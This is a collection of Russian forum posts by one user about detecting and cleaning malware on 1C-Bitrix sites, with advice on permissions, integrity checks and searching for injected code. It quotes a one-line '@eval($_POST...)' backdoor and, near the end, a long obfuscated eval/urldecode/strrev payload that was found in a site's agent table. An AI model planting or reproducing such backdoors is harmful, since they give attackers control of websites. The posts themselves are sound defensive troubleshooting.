Алексей Вдовин (Все сообщения пользователя)

можно полный путь до start.php
очень похоже на штатный Битриксовский обфускатор для кода где лицензионности касается

Зачем Вы сюда это выкинули?
У Вас есть действующая лицензия, обратитесь в службу поддержки.

Согласен.

Не согласен. Код 200 говорит о том, что страница такая есть и POST туда улетел и не вернул ошибку, но это не значит, что он обработался.
Я вам на главную могу кинуть POST любого содержания и вернётся 200 но ничего не произойдёт.

Чтобы удостовериться "поймайте" тело этого запроса ($_POST и $_GET) выше я писал как это можно сделать и в личку мне скиньте.

На моих сайтах и сайтах клиентов никакая зараза не пробивается, так что сильно сомневаюсь в пробивных свойствах этого эксплойта.

/bitrix/ можно только на чтение поставить, кроме этих директорий
/bitrix/backup/
/bitrix/cache/
/bitrix/managed_cache/
/bitrix/stack_cache/
/bitrix/tmp/ - этот не знаю
ну и естественно при обновлениях движка права нужно будет вернуть

переведите в 2х словах плиз

в исходниках с закоментированным кодом?
если так, то я был лучшего мнения о команде программистов Битрикса

vvv476, у Вас на исследуемом сайте стоят все актуальные обновления движка Битрикса?

запросы с CSISO2022KR возможно просто проверочные, так сказать скан по базе доменов на уязвимость
если они есть в логах это ещё не значит, что они отработали и сайт уязвим ...

для проверки осталось только реализовать уязвимость и попробовать на своём сайте

сугубо по фактам - мне не попадалось ни одного зараженного сайта с установленными актуальными обновлениями, так что делайте выводы

да, похоже все последние закладки по str_rot13 находятся - хороший способ
но тем не менее надо сначала фиксить дыры ... следующие закладки будут другие

"заведомо неизменном проекте" - улыбнуло, кто же такое в наше время может гарантировать ?
разве что, на закрытом сайте

Визуально вроде файлы неизменны, тикет уже в работе ... посмотрим чем закончится

для чего тогда в админке заложен такой функционал?

Кстати, раз уж Вы тут - без помощи ТП как то можно замечания по изменению файлов ядра самому фиксить?

просто сколько я не запускал монитор качества - эта проблема абсолютно везде всплывала, как правило все на неё "забивают"
разве что кроме совсем свежих проектов

вычистить иньекции (.htaccess, php и возможно js)

ну это когда восстановите админку - следующий шаг

модифицированность ядра можно посмотреть в мониторе качества
/bitrix/admin/checklist.php?lang=ru

по восстановлению файлов ядра Битрикс - статья

в 2х словах
/bitrix/admin/update_system.php?BX_SUPPORT_PROTOCOL3=Y
где 3 - день месяца  (сегодня 3)

но у меня чёт не завелось как были якобы 4 файла модифицированы, так и остались

у меня пусто - какое такое?

я бы чуток модифицировал - искать смысл только в php и вывод в файлик для дальнейшего анализа



можно ещё "eval(" и "base64_decode(" поискать - тоже часто используют в бэкдорах
но там много будет из не зараженного
у меня в /bitrix/bitrix.php такая инъекция была
@eval($_POST['DOCUMENT_ROOT'];

как вариант запуск "crontab -e ..." с помощью одной из команд
exec()
passthru()
proc_open()
shell_exec()
system()

Код в студию ... (в спойлер плиз)
и файл, где собственно обнаружен

к ознакомлению про /bitrix/modules/main/bx_root.php



остальное лишнее!

Какие люди в наш топик пожаловали
Евгений Жуков,  welcome !

Коллеги, для контроля целостности используйте штатный механизм
Контроль целостности файлов
/bitrix/admin/security_file_verifier.php

Алексей Шибинский,  значит процесс в памяти сидит

мдда, уж - непонятно как такое может из агента запуститься

Скрытый текст

$arAgent["NAME"];//_(9.)H'5t}>qo7ouj7<(>!)U}3/]6u8u}Q%' //>w7u5ST<"IA.xY:8eeval /*9!._IkZ)1 DcpyxJA\"F/C1ra/9+E/&^15>Z"yd3y)vk$p6FN*/(/*]~P@.iKSyR3+hRfkLK~GUv3ZgJ!6dmtClEc{/*/urldecode#Dcc5L6|8cI8+~/?Y(/*I$s6IW3YhccLGyx^v2BAJN@ZnzRYVa+*/strrev/*8/WKh@/MlVGf6?yY`E)" w}SRU5]V{]n+5:tVJCC"j+8+%rlK{n*/(/* GC5%z1bi=x%3OOVsQB~jM%]:PZ*|Ox|v<3|8D`"bY(u*/'b3%56%57%27%47%02%e6%27%57%47%56%27%02%02%02%02%02%02%02%02%a0%d7%02%02%02%02%a0%b3%92%27%42%82%c6%16%67%56%02%02%02%02%a0%56%37%c6%56%02%02%02%02%a0%d7%02%02%02%02%a0%b3%27%42%02%d3%02%47%c6%57%37%56%27%f5%c6%16%67%56%42%02%02%02%02%a0%b3%92%22%13%02%d3%02%44%94%02%54%25%54%84%75%02%72%e4%72%02%d3%02%44%f4%94%25%54%05%f5%35%94%02%c2%03%63%02%d3%02%c4%14%65%25%54%45%e4%94%f5%45%e4%54%74%14%02%45%54%35%02%47%e6%56%76%16%f5%26%02%54%45%14%44%05%55%22%82%97%27%56%57%15%e3%d2%24%44%42%02%02%02%02%a0%b7%92%92%d5%22%87%87%87%56%27%f6%47%37%56%27%22%b5%45%35%54%55%15%54%25%f5%42%82%47%56%37%37%96%82%66%96%02%02%02%02%a0%b3%72%b3%92%82%16%47%16%44%47%96%d6%26%57%37%a3%a3%56%c6%26%16%45%16%47%16%44%27%56%47%e6%57%f6%34%c5%c5%37%36%96%47%97%c6%16%e6%14%c5%c5%e6%96%16%d4%c5%c5%87%96%27%47%96%24%c5%c5%72%02%d3%02%27%42%02%02%02%02%a0%b7%56%37%c6%56%02%02%02%02%a0%d7%02%02%02%02%a0%d7%02%02%02%02%a0%b3%47%96%87%56%02%02%02%02%a0%b7%92%56%42%02%e6%f6%96%47%07%56%36%87%54%82%02%86%36%47%16%36%02%02%02%02%a0%d7%02%02%02%02%a0%b3%92%92%92%d5%22%87%87%87%96%27%47%96%26%22%b5%45%35%54%55%15%54%25%f5%42%82%56%46%f6%36%56%46%c6%27%57%82%56%46%f6%36%56%46%c6%27%57%82%c6%16%67%56%02%d3%02%56%42%02%02%02%02%a0%b7%97%27%47%02%02%02%02%a0%a0%b3%92%22%13%02%d3%02%44%94%02%54%25%54%84%75%02%72%e4%72%02%d3%02%74%e4%94%e4%e4%55%25%02%c2%03%02%d3%02%45%e4%55%f4%34%f5%95%25%45%54%25%02%c2%c4%c4%55%e4%02%d3%02%b4%34%54%84%34%f5%54%45%14%44%02%45%54%35%02%47%e6%56%76%16%f5%26%02%54%45%14%44%05%55%22%82%97%27%56%57%15%e3%d2%24%44%42%02%02%02%02%a0%b7%92%92%d5%22%87%87%87%96%27%47%96%26%22%b5%45%35%54%55%15%54%25%f5%42%82%47%56%37%37%96%82%66%96%02%02%02%02%a0%02%02%02%02%02%02%02%02%a0%'/*}+o|u>#TYS0cP_\NWyaT2'55io>_yv*/) #T/N82kY'xApsEIx`?}`2_DB3;dm) /*pqPWM{~IE(WOT)l=?x[>zBI# yCBI#B:usrCorl6zEeOOSmoMJ.*/)/*LlRo0|sR8iF+.7}{MxB4Iqg8a5bp^OJ+=|z*/;/*"3YH?h_>d.8'Cay+z\A]M!.x,Lu({qx}&SFE<'c!6|)Y^*/

и ко мне тоже пациент пришел

ну это к создателям решения, по идее обновление не должно что-то ухудшить
сделайте полный бэкап и проверьте